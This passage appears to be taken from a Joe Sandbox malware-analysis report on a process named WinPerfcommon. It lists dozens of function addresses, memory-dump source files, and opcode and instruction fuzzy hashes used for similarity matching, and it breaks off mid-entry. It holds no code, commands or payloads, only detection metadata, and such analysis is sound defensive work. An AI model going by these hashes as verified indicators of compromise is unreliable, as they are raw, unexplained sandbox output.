                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 037a104486c3de96e15d762b4bc4a47cc2383cbc90eee4d3cfad59ac6c2a44e9
                                                                  • Instruction ID: e5988f0df103decfab5c72bb174c496b95677491df71bcb167a4d85cb7927b37
                                                                  • Opcode Fuzzy Hash: 037a104486c3de96e15d762b4bc4a47cc2383cbc90eee4d3cfad59ac6c2a44e9
                                                                  • Instruction Fuzzy Hash: F6415E31A0C959DFDB99EF28C495DB5B7F1FBA9360B0405AAD00EC3192DE24F885CB81
                                                                  Function 00007FF849355CD1 Relevance: .1, Instructions: 120COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3c9ad03135474e0d7d80ca8383bb2014e52b73611092d7f4f70c1d7aedf0220b
                                                                  • Instruction ID: d07c499e98ed27c77b54f824ff403e92587c38ff6cb7dedd74220984d306e039
                                                                  • Opcode Fuzzy Hash: 3c9ad03135474e0d7d80ca8383bb2014e52b73611092d7f4f70c1d7aedf0220b
                                                                  • Instruction Fuzzy Hash: 8B318131A0C959DFDB59EF2CC455E75B3E1FBA9350B0405ADD00EC7592CE28E881CB91
                                                                  Function 00007FF84935B341 Relevance: .1, Instructions: 120COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a51d405015eb9929ad94395438b61d40e6fae38af1ffc1b028eaec7b5ddf530c
                                                                  • Instruction ID: 9f2710550a0dce9cee535ba81b03c5b7e6c53351101bb0d5197afbb80b48af90
                                                                  • Opcode Fuzzy Hash: a51d405015eb9929ad94395438b61d40e6fae38af1ffc1b028eaec7b5ddf530c
                                                                  • Instruction Fuzzy Hash: 2F318F31A0C954DFCB99EF28C0A5E75B7F1FBA9350B0406AAD04EC7192DE24F885CB81
                                                                  Function 00007FF849355C6B Relevance: .1, Instructions: 115COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6bbadad84a912c0d274a43d3739386fa6ef227d6daa53fef589953d530931856
                                                                  • Instruction ID: 81d6e944b8c743c451a9ffdfe3bd5c3e032f1aa3199843f9268a92b32ead277b
                                                                  • Opcode Fuzzy Hash: 6bbadad84a912c0d274a43d3739386fa6ef227d6daa53fef589953d530931856
                                                                  • Instruction Fuzzy Hash: 81316131A0C95ADFDB59EF28C455EB5B3E1FBA9350B0405A9D00EC7592DE28E881CB81
                                                                  Function 00007FF84935B2DB Relevance: .1, Instructions: 115COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7b5dfe01cf486b7eacc85dfe59c3d93ac67ab38e1d43a7394bcb29264fa53e0a
                                                                  • Instruction ID: 85f86b07b04b63403582bc630ff05239de578c52027a365da809d076eccf6137
                                                                  • Opcode Fuzzy Hash: 7b5dfe01cf486b7eacc85dfe59c3d93ac67ab38e1d43a7394bcb29264fa53e0a
                                                                  • Instruction Fuzzy Hash: 4E31813160C945DFCB99EF28C0A5EB5B7F1FBA9350B1405AAD00EC7192DE24F885CB81
                                                                  Function 00007FF8493501D3 Relevance: .1, Instructions: 115COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ecbb3b980d4dfc333010ce07c73a64f083b207de843cbfaa9f13c427066db74e
                                                                  • Instruction ID: 556f6deb0178c07cb7255f56d77fcf80ce58df03e92cff5e6319afd8c8004761
                                                                  • Opcode Fuzzy Hash: ecbb3b980d4dfc333010ce07c73a64f083b207de843cbfaa9f13c427066db74e
                                                                  • Instruction Fuzzy Hash: 8A412330C5C9DA8EF779EA1884247B8B7A1FF5A350F5845BAE04ECB0C6CD287885C741
                                                                  Function 00007FF848F4090D Relevance: .1, Instructions: 115COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6e03728bc4c5c89bd0aa8a24b7ed235a4309a1f89846b11be78f6a62e0f1c90a
                                                                  • Instruction ID: 01a91349f9e7ef0c17827991eac4797e95f446eefee5a4cd4b6445b5bb678e6e
                                                                  • Opcode Fuzzy Hash: 6e03728bc4c5c89bd0aa8a24b7ed235a4309a1f89846b11be78f6a62e0f1c90a
                                                                  • Instruction Fuzzy Hash: 2F316D21A1E6562EE345B3BC609A2F96790EF447A4F1409BBD00DCB1E7DE1CA881C29C
                                                                  Function 00007FF8493511D1 Relevance: .1, Instructions: 100COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f269201ce8d0f96ded0dfc344bdb96178d978bc0fc24b4dd9683e00dd8a832c2
                                                                  • Instruction ID: c54edb4e6fab9839ccf2d1ebf4ff392a3a5842e8c98380d703cd3cc96ec9bb41
                                                                  • Opcode Fuzzy Hash: f269201ce8d0f96ded0dfc344bdb96178d978bc0fc24b4dd9683e00dd8a832c2
                                                                  • Instruction Fuzzy Hash: 3431AF30D0D68D9FDB55EFA8C8509ACBBB1FF5A354F0405AAD04AE7182CA289805CB11
                                                                  Function 00007FF84935840D Relevance: .1, Instructions: 99COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 85e5284ffa7583ffbc0a8e3e889019062a8828508928eb2ce3acd97b476aebca
                                                                  • Instruction ID: c841c687244eb3b470dbf4c290ff9862a91a3f969a59e79130fa03f6bce1e304
                                                                  • Opcode Fuzzy Hash: 85e5284ffa7583ffbc0a8e3e889019062a8828508928eb2ce3acd97b476aebca
                                                                  • Instruction Fuzzy Hash: 71317C70E0CA4A9FDB48EF58D4919B8F7A2FF99360B144539C05E93682CF24BC52CB81
                                                                  Function 00007FF8493584CA Relevance: .1, Instructions: 98COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 02291729f0d98d725c14bcff6343e3f8fd483ff3d638a4dcbf9e1ba1254cb5f3
                                                                  • Instruction ID: f8ea2b1dfddb09ee8d4a7fa8cbd004b276ec7ab3e1463ee1cf12327e636d9b72
                                                                  • Opcode Fuzzy Hash: 02291729f0d98d725c14bcff6343e3f8fd483ff3d638a4dcbf9e1ba1254cb5f3
                                                                  • Instruction Fuzzy Hash: 4331C772E0CA8A4FE769EB6894512F8F7E1FF49360F14197AC05EC32C2EE1868458641
                                                                  Function 00007FF849355A35 Relevance: .1, Instructions: 95COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3297885721ca182223d3bdaebeb7a4708c532a342f307a231f5b2ef4d759b9d9
                                                                  • Instruction ID: 923e444c12c78798e254a6ddfa927e633617c6b4549c1cb9284e05d8294a7ee7
                                                                  • Opcode Fuzzy Hash: 3297885721ca182223d3bdaebeb7a4708c532a342f307a231f5b2ef4d759b9d9
                                                                  • Instruction Fuzzy Hash: AF310730D1C58ACFEBAAFF5884955BDB7B1FF49390F54107AD40ED6181DA3878409B82
                                                                  Function 00007FF84935B0A5 Relevance: .1, Instructions: 95COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f7b513e68afc97b5eaad2918408a40d8ad1d2ba5dea118ed513c1bcd5cb3dbb6
                                                                  • Instruction ID: 315c29088f863eff2097d7dc0e366a78ceba6522d6c3e575b143ad8e2709cb98
                                                                  • Opcode Fuzzy Hash: f7b513e68afc97b5eaad2918408a40d8ad1d2ba5dea118ed513c1bcd5cb3dbb6
                                                                  • Instruction Fuzzy Hash: 3E311A3091D98ACFEBA8EF5484915BDB7B1FF5A390F5010BAD00ED7191DB38AA408B81
                                                                  Function 00007FF848F4116D Relevance: .1, Instructions: 93COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 106b20844f0d8ba1fd8367984fee72a1becd06e6f82ba64198282113859f2a49
                                                                  • Instruction ID: 975b504e12cb4f81e61797aeb7eec4e9151f042945ecdd539472421f146214fc
                                                                  • Opcode Fuzzy Hash: 106b20844f0d8ba1fd8367984fee72a1becd06e6f82ba64198282113859f2a49
                                                                  • Instruction Fuzzy Hash: 1A31C73090D5599FDB45FB24C859ABD7BF0FF6A300F0405BAC00AD71A2DB389880CB50
                                                                  Function 00007FF848F40998 Relevance: .1, Instructions: 91COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 11b3de30c454029966a1b9786025a48e73c1113429606af8c98fad4ae6a46672
                                                                  • Instruction ID: 29d626e5a3463e66d887f4d4bc9a720dd0c46bbd57cdeaaf7e7445295a03e75c
                                                                  • Opcode Fuzzy Hash: 11b3de30c454029966a1b9786025a48e73c1113429606af8c98fad4ae6a46672
                                                                  • Instruction Fuzzy Hash: 1221F330B1D9191FE788F72C945967972D2EB98791F1000BAE40EC33D7DE18AC818249
                                                                  Function 00007FF849350198 Relevance: .1, Instructions: 88COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b2a91ea98f7c0c55cddb4864a6384e7175edd86a57e9b8eb0b2a9d58f07f167f
                                                                  • Instruction ID: d099e8413fc4d4c5c948149dcec2f46bd67bc71beb21befcad80258954f78d2a
                                                                  • Opcode Fuzzy Hash: b2a91ea98f7c0c55cddb4864a6384e7175edd86a57e9b8eb0b2a9d58f07f167f
                                                                  • Instruction Fuzzy Hash: 4A310931D1C98ACFEBB9EF5684925BEB6B1FF46381F60117AD00EE2181DE786D409A41
                                                                  Function 00007FF849354921 Relevance: .1, Instructions: 87COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 144f00e151684107ca1a729423552f5c24167f5305c6be166aff1765574fa367
                                                                  • Instruction ID: 751fa29876f3fc21105be1d9d4224f46e4b9b715b5075fb97dbcb2494d81149d
                                                                  • Opcode Fuzzy Hash: 144f00e151684107ca1a729423552f5c24167f5305c6be166aff1765574fa367
                                                                  • Instruction Fuzzy Hash: 9231FC2091D5F74EE37DAA189469574BBA1EF9736071846BAC08E8B48BC81CB481D341
                                                                  Function 00007FF849359F90 Relevance: .1, Instructions: 87COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: aed33a685a3097a89631857eddc952e6d6c0d3e78b21ccc70da110125763cb46
                                                                  • Instruction ID: b648bd9d0b644096cdb87bd488587b27fcfad871573cf851d17c73f479578d90
                                                                  • Opcode Fuzzy Hash: aed33a685a3097a89631857eddc952e6d6c0d3e78b21ccc70da110125763cb46
                                                                  • Instruction Fuzzy Hash: 5B315E2092D5E68FE33996148460574BF61FF9B3A171855BAD09BCB4D7C92C7881A381
                                                                  Function 00007FF848F40C25 Relevance: .1, Instructions: 86COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 21ce39f94525866e08950e4ba88c6498a6c75fe4b8a21b80fa23065d64665ff9
                                                                  • Instruction ID: 278113ba90e08f18ff464acf6b08ec1853897cd2b38cce4505f3b42c569753c3
                                                                  • Opcode Fuzzy Hash: 21ce39f94525866e08950e4ba88c6498a6c75fe4b8a21b80fa23065d64665ff9
                                                                  • Instruction Fuzzy Hash: 2121E136A0D24A9EE342B778A8011ED3B70EF923A5F1441B3D548EB1D3DA3C254AC699
                                                                  Function 00007FF849351D42 Relevance: .1, Instructions: 84COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 44a0d6184120cb72f031605bb37bdc71a109369c6b6711a0a6ce4f7a446f455f
                                                                  • Instruction ID: 20b2559ac578cbb019f53f65d4f9dcb93b73cbe78900f7c8fb5803281ebbfd4c
                                                                  • Opcode Fuzzy Hash: 44a0d6184120cb72f031605bb37bdc71a109369c6b6711a0a6ce4f7a446f455f
                                                                  • Instruction Fuzzy Hash: 3A21E531E0891D9FDF99EF58C4A5AA9B7F1FB69354F0001AAD00EE3291CA35A980CB40
                                                                  Function 00007FF8493568BD Relevance: .1, Instructions: 80COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 163faa6ae90659b0138c69e5f5b304cf1d8141a65cb62c99e4de658c9ec6e7a6
                                                                  • Instruction ID: f2d719235ee18ec64d0098215507ba08ac60f74a6c7318489651a57d3c734cac
                                                                  • Opcode Fuzzy Hash: 163faa6ae90659b0138c69e5f5b304cf1d8141a65cb62c99e4de658c9ec6e7a6
                                                                  • Instruction Fuzzy Hash: 9B218935D0C99EDFDBA4EF58C8605BCBBB2FF59394F10107AD00AE3281DA246905CB50
                                                                  Function 00007FF84935C669 Relevance: .1, Instructions: 71COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ede2db6cf71c42fb6eae7295083e669198d1b5e0a7e2bb64d8ab6f0c08b0301a
                                                                  • Instruction ID: 1d993d2df851e9df1d33c9a5c3719dbf6633a9976cbbbb232a20a68e88c1707a
                                                                  • Opcode Fuzzy Hash: ede2db6cf71c42fb6eae7295083e669198d1b5e0a7e2bb64d8ab6f0c08b0301a
                                                                  • Instruction Fuzzy Hash: 0C212A70E194499FDB98EF18C455AADB7F0FF59714F0450BDD00EE3291CE34A9418B41
                                                                  Function 00007FF849352EA5 Relevance: .1, Instructions: 70COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dcbf1261c7795f780892d194e3e536bd5a5a1660ba6f6bea97c9dbad59e52c09
                                                                  • Instruction ID: 81fd892618fd2af89844d74aca8eb8d4ea42664dc45b421106333ae7ca4b29a8
                                                                  • Opcode Fuzzy Hash: dcbf1261c7795f780892d194e3e536bd5a5a1660ba6f6bea97c9dbad59e52c09
                                                                  • Instruction Fuzzy Hash: B7110671D0DA858FEB59FB68A8565E8BBB0FF1A360F14017DC04AC3293DA295842CB00
                                                                  Function 00007FF848F45745 Relevance: .1, Instructions: 70COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9f0721524457683585aa9097096851cb79a5fc942e3fc4e8c9bab8ddc02e0342
                                                                  • Instruction ID: 29be79ac81ebb2b1284e56fc8468d0e6894eaa8508e3f2dd836af26e13651f8a
                                                                  • Opcode Fuzzy Hash: 9f0721524457683585aa9097096851cb79a5fc942e3fc4e8c9bab8ddc02e0342
                                                                  • Instruction Fuzzy Hash: DD212130D1C5098FEA94F71498566B973D1FFA8B80F5041B6DC5DE32D2EF287D444689
                                                                  Function 00007FF849354950 Relevance: .1, Instructions: 68COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1cb952e8e371ef8324783c31ffeeaf34e1f98c8c39e1d038d58931fb51f9436e
                                                                  • Instruction ID: 93c539a9ac005e50f567b4f354243a57d6e76b5e0570ee94e3cf88c69881f2ba
                                                                  • Opcode Fuzzy Hash: 1cb952e8e371ef8324783c31ffeeaf34e1f98c8c39e1d038d58931fb51f9436e
                                                                  • Instruction Fuzzy Hash: 1B11BB3091C4F78EF57CFE0894995B4B391EB9A3917145675C44F8B48EC92CB881D785
                                                                  Function 00007FF849359FC0 Relevance: .1, Instructions: 68COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: abbd1a499e844624d2a2ca253fe0779d7a49f8153371aea0123159475aef1cc3
                                                                  • Instruction ID: 875de0f2a6d3fed2c6e729e7e399ba57f782cbde5f495afaf48f6a99880b2fae
                                                                  • Opcode Fuzzy Hash: abbd1a499e844624d2a2ca253fe0779d7a49f8153371aea0123159475aef1cc3
                                                                  • Instruction Fuzzy Hash: 1811BB3093D4A6CFE57CAA0484505B4B751FF9A3A2B149575D05FCB5DAC93CB981A2C0
                                                                  Function 00007FF84935903C Relevance: .1, Instructions: 67COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e9893e901b86e9ffd041cdddf79441dff20fc6594118518172023a9719958300
                                                                  • Instruction ID: 6cb6565b675539f046e496a797ede0cb3b54888678c52bfc5c00608c7e8316db
                                                                  • Opcode Fuzzy Hash: e9893e901b86e9ffd041cdddf79441dff20fc6594118518172023a9719958300
                                                                  • Instruction Fuzzy Hash: CE11043190EA469FEB15FF34D4018FA77A1EF492A1F400A7AD08EC75C2DF2DA50987A0
                                                                  Function 00007FF849352CE9 Relevance: .1, Instructions: 65COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5a0b2e00a446501db375da6d9176dbe4bd5196a5df07259c4211b8c15e846829
                                                                  • Instruction ID: 5465c6aa10e3a02c8eee783a2628cf8bfa65050e1081def7e8d1abc6056dd4e5
                                                                  • Opcode Fuzzy Hash: 5a0b2e00a446501db375da6d9176dbe4bd5196a5df07259c4211b8c15e846829
                                                                  • Instruction Fuzzy Hash: D611533290D68A5FE761EA6488046BA7FB4DF5B390F0800B6D04AD7192DE28284687A0
                                                                  Function 00007FF84935835A Relevance: .1, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 12a4f7324c00b7f884cbaa7b42f8a10a78cd4eb060e0d27027ef96e6a38aaba8
                                                                  • Instruction ID: 40482df980aa02d7dfb002668f34d4aacaaddd871b93336056d256d77e5cefda
                                                                  • Opcode Fuzzy Hash: 12a4f7324c00b7f884cbaa7b42f8a10a78cd4eb060e0d27027ef96e6a38aaba8
                                                                  • Instruction Fuzzy Hash: AA11E971D0CB8D8FE775AA6888452B9B7E1FF9E3A0F04197AD40DD7281DE642D168381
                                                                  Function 00007FF8493539D0 Relevance: .1, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 846d0ca7cbbc44f24f83d58978e41c7c69a2aa43b580c8fa0acf49ba0bd885fd
                                                                  • Instruction ID: 98a78c2663a5d3b838dd084ed5fd9f6b205d7b7a6a44e4f3b3b04597e004d006
                                                                  • Opcode Fuzzy Hash: 846d0ca7cbbc44f24f83d58978e41c7c69a2aa43b580c8fa0acf49ba0bd885fd
                                                                  • Instruction Fuzzy Hash: 94119D3191DA498EEB64FF24D4405A6B3A1EF843A1F40063AD48EC36C2DF29A94487A1
                                                                  Function 00007FF84935744E Relevance: .1, Instructions: 61COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c4e7143dce5aa8ef044ae8f31c00bf77b8804e348e922fc315a29f927bf856b8
                                                                  • Instruction ID: e9ca847788825f4a3b4c1d69207ded26820792851f8858f3d9f3a201b13a3e44
                                                                  • Opcode Fuzzy Hash: c4e7143dce5aa8ef044ae8f31c00bf77b8804e348e922fc315a29f927bf856b8
                                                                  • Instruction Fuzzy Hash: 60110730E188599FDB9CEB58D465ABDB7B1FB9D360F0001BED00EE3691CE2969808B44
                                                                  Function 00007FF84935C68E Relevance: .1, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 512ea99d560c491913a2260ec2f57165c35fb04d990de14389cfc5288d7c128a
